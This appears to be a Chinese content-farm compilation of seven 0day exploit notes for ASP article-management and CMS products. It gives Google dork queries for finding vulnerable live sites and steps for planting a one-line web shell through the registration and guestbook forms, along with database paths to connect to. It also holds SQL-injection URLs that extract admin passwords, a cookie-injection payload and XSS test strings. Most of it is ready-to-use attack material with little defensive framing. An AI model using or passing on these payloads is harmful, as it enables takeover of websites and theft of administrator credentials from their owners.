大榕树网络文章管理系统0day
“jianghua”通过精心收集,向本站投稿了7篇大榕树网络文章管理系统0day,下面是小编整理后的大榕树网络文章管理系统0day,欢迎大家阅读分享借鉴,希望对大家有所帮助。
篇1:大榕树网络文章管理系统0day
大榕树网络文章管理系统 Ver 3.0 Build 090602 用户注册处过滤不严 可插入一句话
利用:Google:inurl:ArtClaShow.asp?cid ( 搜索inurl:ArtClaShow.asp?cid获得大约1,170条查询结果,以下是第1-10条)
打开网页,找到注册新用户 或者直接跳到UserReg.asp页面,在用户介绍处插入一句话 ┼}诞整超∨≡┩ ,其他按要求输入
如果看到注册成功,等待管理员审核,不用管,连接数据库即可,
大榕树网络文章管理系统0day
,
貌似现在流行这样插。密码 a
数据库地址:data/admin_article.asp
篇2:大榕树网络文章管理系统Ver 3.0 0day
用户注册处过滤不严,可插入一句话
利用:
Google:inurl:ArtClaShow.asp?cid
打开网页,找到注册新用户,或者直接跳到UserReg.asp页面,
在用户介绍处插入一句话 ┼}诞整超∨≡┩ ,其他按要求输入
如果看到注册成功,等待管理员审核,不用管,连接数据库即可.貌似现在流行这样插.
密码a,数据库地址:data/admin_article.asp
篇3:老Y文章管理系统注射0day
幻泉[B.S.N] 防线
漏洞等级:中等
漏洞说明:
漏洞出现在js.asp中,我们首先看源代码,
Code:
If CheckStr(Request(“ClassNo”)) “” then
ClassNo = split(CheckStr(Request(“ClassNo”)),“|”)
'这里是获取变量利用checkstr过滤,但是感觉好像没起作用。然后分成数组
on error resume next
NClassID = LaoYRequest(ClassNo(0))
NClassID1 = LaoYRequest(ClassNo(1))
'获取数组1,与数组2进行整形过滤。这里没有漏洞
End if
num = LaoYRequest(request.querystring(“num”))'这里num必须>=1
.......
set rs=server.createObject(“Adodb.recordset”)
sql = “Select top ”& num &“ ID,Title,TitleFontColor,Author,ClassID,DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0”
If NclassID“” and NclassID1=“” then
If Yao_MyID(NclassID)=“0” then
SQL=SQL&“ and ClassID=”&NclassID&“”
else
MyID = Replace(“”&Yao_MyID(NclassID)&“”,“|”,“,”)
SQL=SQL&“ and ClassID in (”&MyID&“)”
End if
elseif NclassID“” and NclassID1“” then
MyID = Replace(“”&Request(“ClassNo”)&“”,“|”,“,”)
SQL=SQL&“ and ClassID in (”&MyID&“)”
'这里出现的问题classno并没做其他过滤就写入到查询
End if
select case topType
case “new” sql=sql&“ order by DateAndTime desc,ID desc”
case “hot” sql=sql&“ order by hits desc,ID desc”
case “IsHot” sql=sql&“ and IsHot = 1 order by ID desc”
end select
set rs = conn.execute(sql)
if rs.bof and rs.eof then
str=str+“没有符合条件的文章”
........
-------------------------------
function.asp
Code:
function CheckStr(str)
CheckStr=replace(replace(replace(replace(str,“<”,“<”),“>”,“>”),chr(13),“”),“ ”,“”)
CheckStr=replace(replace(replace(replace(CheckStr,“'”,“”),“and”,“”),“insert”,“”),“set”,“”)
CheckStr=replace(replace(replace(replace(CheckStr,“select”,“”),“update”,“”),“delete”,“”),chr(34),“”)
CheckStr=replace(replace(replace(replace(replace(CheckStr,“*”,“”),“=”,“”),“or”,“”),“mid”,“”),“count”,“”)
end function
利用代码:
js.asp?num=1&ClassNo=1|1|1[SQL]
js.asp?num=1&ClassNo=1|1|1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1 ####获取密码代码
备注:本漏洞在2.4版本测试 站长站下载地址down.chinaz.com/soft/23126.htm
篇4:娱大妈文章管理系统YM1.0版0day
んㄗ葑Mi
娱大妈文章管理系统YM1.0版用户留言处过滤不严,数据库未作任何处理,可以插入一句话,迅速拿下Shell,
本来不想看这套程序的,刚准备删除时,找了个关键字Google 了一下,发现该系统有海量用户,后来简单测试了一下,均可拿下,
Google:inurl:lunshow.asp?pid inurl:/js/lunshow.asp?pid 后来在测试时发现第一个关键字大多数是娱大妈的,第二个包含了部分c9的用户,不过通杀。
打开网页,直接跳到/guest/index.asp页面,留言内容为经典的一句话 ┼}诞整超∨≡┩ 数据库地址为 /db/%23%20db.asa,连接即可。
篇5:烈火文章后台管理系统V2.1 0day漏洞预警
烈火文章后台管理系统采用二级分类,界面简洁大方,功能简单易用,可远程自动上传图片
删除文章后,文章相关图片也一并删除减少垃圾文件的存在,
首先打开article.asp见如此语句
<%
set rs=conn.execute(“select * from article where id=”&request(“id”))(完全用request接收)
%>
■ <%=rs(“classname”)%>>
<%=rs(“title”)%>
随即看上内容
直接打开Check_SqlIn.asp
<%
'SQL通用防注入程序,只需要在conn.asp之类的打开数据库文件之前引用这个页面即可
dim sql_injdata
SQL_injdata =“'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare”
SQL_inj = split(SQL_Injdata,“|”)
If Request.QueryString“” Then
For Each SQL_Get In Request.QueryString
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.QueryString(SQL_Get),Sql_Inj(Sql_DATA))>0 Then
Response.Write “”
Response.end
end if
next
Next
End If
If Request.Form“” Then
For Each Sql_Post In Request.Form
For SQL_Data=0 To Ubound(SQL_inj)
if instr(Request.Form(Sql_Post),Sql_Inj(Sql_DATA))>0 Then
Response.Write “”
Response.end
end if
next
next
end if
%>
很明显只是过滤get和post
存在cookies注入
付上exp
javascript.:alert(document.cookie=“id=”+escape(“95 and 1=2 union select 1,2,3,user,5,6,password,8,9,10,11,12,13,14 from admin”));
后台/admin/admin_login.asp
By:暗月式
篇6:米号吧文章管理系统跨站0day漏洞漏洞预警
多处跨站漏洞,影响版本:ZipWrangler 1.20
测试代码:
127.0.0.1/index.asp?forumID=2&subclassID=1&act=1&classicID=1>“>&page=1
127.0.0.1/index.asp?forumID=2&subclassID=1&act=1>”>&classicID=1&page=1
127.0.0.1/index.asp?forumID=2&subclassID=1>“>&act=1&classicID=1&page=1
127.0.0.1/ssb.asp?forumID=1&subclassID=1>”>&act=1&classicID=1&page=1
篇7:尘月网络企业网站智能管理系统0day利用程序
漏洞报告:
www.jshell.cn/logview.asp?id=81
Google关键字:inurl:/Web-GuestView.asp
测试方法:
127.0.0.1/Company.asp?%69d=7%20or%201=2%20un%69on%20s%65lect%201,username,password,4,5,6,7,8%20fr%6Fm%20admin
【大榕树网络文章管理系统0day】相关文章:
2.合同管理系统
3.管理系统心得体会
5.畅谈网络终端系统
6.网络管理自查报告
7.网络管理研究
9.计量检测管理系统
10.客户管理系统论文






文档为doc格式